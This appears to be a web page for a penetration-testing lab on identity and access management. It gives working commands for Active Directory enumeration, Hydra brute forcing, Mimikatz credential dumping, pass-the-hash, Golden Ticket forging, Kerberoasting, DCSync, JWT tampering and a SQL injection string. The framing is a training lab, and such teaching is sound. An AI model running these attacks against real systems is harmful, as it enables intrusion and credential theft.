Home > IAM Security Roadmap > Lab Exercise

๐Ÿงช IAM Security Assessment Lab

Conduct comprehensive identity and access management security assessment and penetration testing

Intermediate Level

Lab Overview

This comprehensive lab exercise will guide you through conducting a complete IAM security assessment, including authentication testing, authorization bypass techniques, privilege escalation, and Active Directory penetration testing. You'll learn to identify and exploit common IAM vulnerabilities while understanding defensive strategies and mitigation techniques.

Duration: 6-8 hours
Difficulty: Intermediate
Prerequisites: Basic Windows/Linux knowledge, networking fundamentals
Environment: Windows Active Directory, Linux servers, web applications

๐ŸŽฏ Learning Objectives

๐Ÿ—๏ธ Lab Environment Setup

Prerequisites Installation

Required Tools:

  • Kali Linux or Windows with penetration testing tools
  • BloodHound and PowerView for AD enumeration
  • Mimikatz for credential extraction
  • Burp Suite Professional for web app testing
  • Postman for API testing
  • Impacket suite for network protocol testing

Environment Configuration

1. Set up Active Directory Lab

# Download and configure Windows Server 2019
# Install Active Directory Domain Services
Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools

# Promote server to domain controller
Install-ADDSForest -DomainName "lab.local" -SafeModeAdministratorPassword (ConvertTo-SecureString "Admin123!" -AsPlainText -Force)

2. Configure Test Users and Groups

# Create test users with different privilege levels
New-ADUser -Name "testuser1" -SamAccountName "testuser1" -UserPrincipalName "testuser1@lab.local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true

# Create privileged groups
New-ADGroup -Name "Domain Admins" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "Domain Admins" -Members "adminuser"

3. Set up Web Application Targets

# Deploy vulnerable web applications
# DVWA (Damn Vulnerable Web Application)
# WebGoat
# Juice Shop

๐Ÿ“‹ Lab Exercises

Exercise 1: Active Directory Enumeration

Objective

Enumerate Active Directory environment to understand domain structure, users, groups, and permissions.

Tasks

  1. Perform initial domain reconnaissance
  2. Enumerate domain users and groups
  3. Identify service accounts and privileged users
  4. Map group memberships and permissions
  5. Analyze domain trust relationships

PowerView Commands:

# Import PowerView
Import-Module .\PowerView.ps1

# Get domain information
Get-NetDomain

# Enumerate domain users
Get-NetUser | Select-Object samaccountname,description,lastlogon

# Get domain groups
Get-NetGroup | Select-Object samaccountname,description

# Find privileged groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Enterprise Admins"

# Enumerate computers
Get-NetComputer | Select-Object samaccountname,operatingsystem

Exercise 2: Authentication Security Testing

Objective

Test authentication mechanisms for vulnerabilities and bypass techniques.

Tasks

  1. Perform password brute force attacks
  2. Test account lockout mechanisms
  3. Analyze authentication protocols
  4. Test multi-factor authentication bypass
  5. Examine session management security

Hydra Brute Force Example:

# SSH brute force attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target-ip

# SMB brute force attack
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://target-ip

# Web form brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f http-post-form "target/login.php:username=^USER^&password=^PASS^:Invalid"

Exercise 3: Privilege Escalation Techniques

Objective

Execute privilege escalation attacks on Windows and Linux systems.

Tasks

  1. Perform Windows local privilege escalation
  2. Exploit Linux privilege escalation vectors
  3. Extract and crack password hashes
  4. Perform token impersonation attacks
  5. Exploit service account privileges

Mimikatz Credential Extraction:

# Load Mimikatz
mimikatz.exe

# Extract LSASS memory
sekurlsa::logonpasswords

# Extract Kerberos tickets
sekurlsa::tickets /export

# Pass-the-hash attack
sekurlsa::pth /user:admin /domain:lab.local /ntlm:hash /run:cmd.exe

# Golden Ticket creation
kerberos::golden /user:admin /domain:lab.local /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi

Exercise 4: Active Directory Attack Techniques

Objective

Execute advanced Active Directory attack techniques including Kerberoasting and DCSync.

Tasks

  1. Perform Kerberoasting attacks
  2. Execute ASREPRoasting
  3. Perform DCSync attacks
  4. Exploit ACL-based privilege escalation
  5. Execute Golden Ticket and Silver Ticket attacks

Kerberoasting with Impacket:

# Request service tickets
python3 GetUserSPNs.py lab.local/testuser1:Password123! -dc-ip 192.168.1.10 -request

# Crack service tickets with Hashcat
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# ASREPRoasting attack
python3 GetNPUsers.py lab.local/testuser1:Password123! -dc-ip 192.168.1.10 -request

# DCSync attack
python3 secretsdump.py lab.local/testuser1:Password123!@192.168.1.10

Exercise 5: Web Application IAM Testing

Objective

Test web application identity and access management vulnerabilities.

Tasks

  1. Test authentication bypass techniques
  2. Perform authorization testing
  3. Test session management security
  4. Analyze JWT token security
  5. Test OAuth and SSO implementations

JWT Token Manipulation:

# Decode JWT token
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | base64 -d

# Modify JWT payload
{
  "sub": "1234567890",
  "name": "John Doe",
  "role": "admin",
  "iat": 1516239022
}

# Test JWT signature bypass
# Try "none" algorithm
# Try weak secret keys
# Try algorithm confusion attacks

Exercise 6: API Security Testing

Objective

Test API authentication and authorization mechanisms.

Tasks

  1. Test API key security
  2. Analyze OAuth 2.0 implementations
  3. Test JWT token validation
  4. Perform authorization bypass testing
  5. Test rate limiting and throttling

API Testing with Postman:

# Test API endpoints without authentication
GET /api/users
Authorization: Bearer invalid_token

# Test with different user roles
GET /api/admin/users
Authorization: Bearer user_token

# Test parameter manipulation
GET /api/users?id=1
GET /api/users?id=1' OR '1'='1

# Test HTTP method bypass
POST /api/users (instead of GET)
PUT /api/users (instead of GET)
PATCH /api/users (instead of GET)

๐Ÿงช Lab Validation

Security Assessment Checklist

Assessment Metrics

Vulnerabilities Found

Target: > 10 critical/high

Privilege Escalation Success

Target: > 80%

Domain Compromise

Target: Domain admin access

Credential Extraction

Target: > 50% of accounts

๐Ÿ“š Additional Resources

๐Ÿ“ง Stay Updated with New Labs

Get notified when we add new hands-on lab exercises and practical content!

๐Ÿ“ˆ Lab Progress

Track your IAM Security lab completion:

Complete the exercises above to track your progress

โ† Back to IAM Security Roadmap